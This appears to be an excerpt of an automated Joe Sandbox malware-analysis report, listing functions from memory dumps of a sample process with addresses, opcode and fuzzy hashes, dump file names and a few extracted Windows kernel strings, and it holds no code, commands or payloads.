                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                    • API String ID: 0-3887548279
                                                                                                                                                                                    • Opcode ID: c0628fd986619627b6302748f753d5ad595e4d04418077e8cefceef9e2bba27f
                                                                                                                                                                                    • Instruction ID: d40165270fcfcedd80acac774fbd393f2c8b4f1a636fb76bba10551393bf88db
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0628fd986619627b6302748f753d5ad595e4d04418077e8cefceef9e2bba27f
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1216070604105ABCB18CF5ADC81CAB77A9EFC4724714C15AE8098BB05E738ED91CBE8
                                                                                                                                                                                    Function 0041B280 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7574933a44b0fdf8b64d52a8e9ec827446bccbfb52860849b7ddde52bd5142c4
                                                                                                                                                                                    • Instruction ID: de2ed033ce42278643d0ecb15df6f765b958d073a96daf7b0653906d73af5185
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7574933a44b0fdf8b64d52a8e9ec827446bccbfb52860849b7ddde52bd5142c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4811E7716442087BE220DA65DC82FEB73DCDF49708F00055AFA18CB281E7A5AE9583E9
                                                                                                                                                                                    Function 0041BD01 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: daa8aa814ac95f2f8ced5311b622f4cb67e0e31d2c296112237d25487c6ba4cf
                                                                                                                                                                                    • Instruction ID: 697f16fab74a690f05ce97b3ae80c75cc792162026cd5e876bfc473946e8d1e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: daa8aa814ac95f2f8ced5311b622f4cb67e0e31d2c296112237d25487c6ba4cf
                                                                                                                                                                                    • Instruction Fuzzy Hash: D701F5715042886FDB04DF24EC82AE677D8EF44364F04868EF818CB142E779D6618B91
                                                                                                                                                                                    Function 0041B570 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 83689f81059a6b49a2024fe5df60d3a41d9544cfe624bc4d74d54462aac7b488
                                                                                                                                                                                    • Instruction ID: e90d50ebbf5f58e3ad0a79cb29ceb9f8597f2691e9ad76120241f9398c4b1d9a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83689f81059a6b49a2024fe5df60d3a41d9544cfe624bc4d74d54462aac7b488
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2001627290030C66DB14EBE1CC82FEF773D9B44704F00459AB7496B0C2E679A698CBE5
                                                                                                                                                                                    Function 0041B27B Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8767d24dd5cb5df7964204619b8a838ff7632b57bff39019f86d90b73a0abc28
                                                                                                                                                                                    • Instruction ID: d0fa04a2c6bcaf01bae8be6e7381e5cca8bec23f851924a4c652d846c5d7f372
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8767d24dd5cb5df7964204619b8a838ff7632b57bff39019f86d90b73a0abc28
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E09B717452083BF61095969C83FE772CCDF49764F000056FA08D7281E5E96DD042E9
                                                                                                                                                                                    Function 0041BF59 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c35649d22946e5c474b606083634020b4a7a6bacc31ba0e0f9380b9cb5d833c0
                                                                                                                                                                                    • Instruction ID: b286b29d431484ac0c7716daba64a37cc93c8fbdc72a1c00db294aa7d517cf32
                                                                                                                                                                                    • Opcode Fuzzy Hash: c35649d22946e5c474b606083634020b4a7a6bacc31ba0e0f9380b9cb5d833c0
                                                                                                                                                                                    • Instruction Fuzzy Hash: FBE0D8367002107BC2209659DC46FD7B768CBC4B64F090165FA0CD7301E6289D4186E5
                                                                                                                                                                                    Function 0041BD50 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 38c6c326ce4ad33f05e29f6f7788b92ff59919cab33535bedbac99f45c558931
                                                                                                                                                                                    • Instruction ID: 41f32d51419d74dc4a9da0f683c996f9e5c7be6796b01064dfd11c382aa31147
                                                                                                                                                                                    • Opcode Fuzzy Hash: 38c6c326ce4ad33f05e29f6f7788b92ff59919cab33535bedbac99f45c558931
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CE0EDB660430E6F9B04CE69DC52CAB37ACEB48214B04451AFC09C3200F630F9208BA1
                                                                                                                                                                                    Function 0041BF60 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 464f7d1c597164a6d5357f671cdf5d26846a914594145784788906905fc075af
                                                                                                                                                                                    • Instruction ID: e8f2d5b6531cf6e7fdc51e43174f77600670f5a93a1743d7ba89319a7aa4225a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 464f7d1c597164a6d5357f671cdf5d26846a914594145784788906905fc075af
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E0863660131437C220558ADC06FD7B75CCBC5F64F09002AFE0C9B341E668AD8186E9
                                                                                                                                                                                    Function 0041BD10 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c40b263e171f7afe17e06ae10761000326582230c5089b313f59c0bdbc66b179
                                                                                                                                                                                    • Instruction ID: c6fc234e1bb99ff65f56378bf5e044b51cb105a8b799a7e722716a2ca120b4b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: c40b263e171f7afe17e06ae10761000326582230c5089b313f59c0bdbc66b179
                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F0AC75610209AFDB04CF59C881EDB73A9EB88750F04C519FD19CB241E774EA11CBA1
                                                                                                                                                                                    Function 0041B940 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a41cd42a5fc2232a364da95367f21f738660a4e3fb78708dd8b08bff0254022e
                                                                                                                                                                                    • Instruction ID: 962367b92bd2a9ec76eb27684a3d5b6c114e4298b9661d9b67db10bb08b19143
                                                                                                                                                                                    • Opcode Fuzzy Hash: a41cd42a5fc2232a364da95367f21f738660a4e3fb78708dd8b08bff0254022e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 26E02B7181030856F764F7708D4BFD9737C8B04308F0007D9B60C661C2FB7856554A96
                                                                                                                                                                                    Function 0041BD8B Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 17f3b149a4332b239e0677116ac8955fb86d1c8c9f4b72f3a1a3db4a441b3775
                                                                                                                                                                                    • Instruction ID: bbd832aff0c8ef618e4166a392593e8999a7600e5c75283dd26985c2bad6ed6b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17f3b149a4332b239e0677116ac8955fb86d1c8c9f4b72f3a1a3db4a441b3775
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2D012B96001047BDE04EB88ED46FE633ADA748715F48C04AB54C8F342D239FDA08759
                                                                                                                                                                                    Function 0041BD90 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7ff3bc997b7e8420044eb2aae527a3d3b88b8387f7e416a5616c9eb0b9c8c3e0
                                                                                                                                                                                    • Instruction ID: 34338f23d7e64903e0b9a54f15b02f3c0b1d2e4bbca900a8ee38a589897490cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ff3bc997b7e8420044eb2aae527a3d3b88b8387f7e416a5616c9eb0b9c8c3e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: A9C080755003087FD704EF8CDC46F5533DC9708614F044044B90C8B342D574FD508755
                                                                                                                                                                                    Function 0041F180 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b34cb9bedde95fdc994ce97802ba12d5c0db0773172be4f358f5ebf5e3f3b180
                                                                                                                                                                                    • Instruction ID: 71cd0b4ea5b82251a8dfacf4b4f4a81eb47669f17a6830740459b1cdfa128c40
                                                                                                                                                                                    • Opcode Fuzzy Hash: b34cb9bedde95fdc994ce97802ba12d5c0db0773172be4f358f5ebf5e3f3b180
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7A022A0C0830C03002030FA2B03023B30CC000028F0003EAAE8C022023C02A83200EB

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 00D50080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: [Pj
                                                                                                                                                                                    • API String ID: 0-2289356113
                                                                                                                                                                                    • Opcode ID: ad5027ff16efdc65b69baa8a45fb05458cd2427a154001173cd43d766673b5e7
                                                                                                                                                                                    • Instruction ID: 083143678055d90f46a13592775bd6e5d06212fc7afef3adc05d52e43cb7a3cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad5027ff16efdc65b69baa8a45fb05458cd2427a154001173cd43d766673b5e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF0CD31204344ABEB22AB14CC85F2A7FA9EF85745F148818FD816A0D3C762C829E731
                                                                                                                                                                                    Function 00D726F8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                                                    • Instruction ID: 168be04370a1b2dc1924c4aa23b1b40ab5ca3f07c30eb36f21ef0c33b9da7372
                                                                                                                                                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44F0C221324599EBDB4CEA189E5277A33D5EB94300F58C079ED8DC7251F631DE4082B0
                                                                                                                                                                                    Function 00DB0101 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                                                                                                    • Instruction ID: a0f3bf56bc19ff370c57e7e2bc9dedef89accf6340228bce574ef7eb5a426097
                                                                                                                                                                                    • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F0FE72240304DFCB5CCF08C490BFA7BA6AB90755F24446DE50BCF691D735D941DA65
                                                                                                                                                                                    Function 00D500EA Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 62f2b429010fabb940d2085b1dceb5ec44ae71804a7f5491a852a2e0678c08b2
                                                                                                                                                                                    • Instruction ID: 2f81947ec032acf8b5f1306df613b616acf8ca4e31e2f226a5b53feec4f7baea
                                                                                                                                                                                    • Opcode Fuzzy Hash: 62f2b429010fabb940d2085b1dceb5ec44ae71804a7f5491a852a2e0678c08b2
                                                                                                                                                                                    • Instruction Fuzzy Hash: FFE01AB1544B81CBD311DF14D901B1AB7E5FF89B11F15483AFC0597790D7789A09C972
                                                                                                                                                                                    Function 00D88788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 00D88827
                                                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 00D887E6
                                                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 00D889FC
                                                                                                                                                                                    • WindowsExcludedProcs, xrefs: 00D887C1
                                                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00D88914
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                                                    • Opcode ID: bd4c93d1791abfd131164d346fbf6422c30d60d567b444258fd9b58359b519a4
                                                                                                                                                                                    • Instruction ID: 18a26010ab0aca5f856463473095b4177a62b90a2f889cf3151be417f637a260
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd4c93d1791abfd131164d346fbf6422c30d60d567b444258fd9b58359b519a4
                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F1E5B6D00249EFCF11EF99C9819EEB7B9FF08300F55446AE505A7211EB34AA45EB70
                                                                                                                                                                                    Function 00DF822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
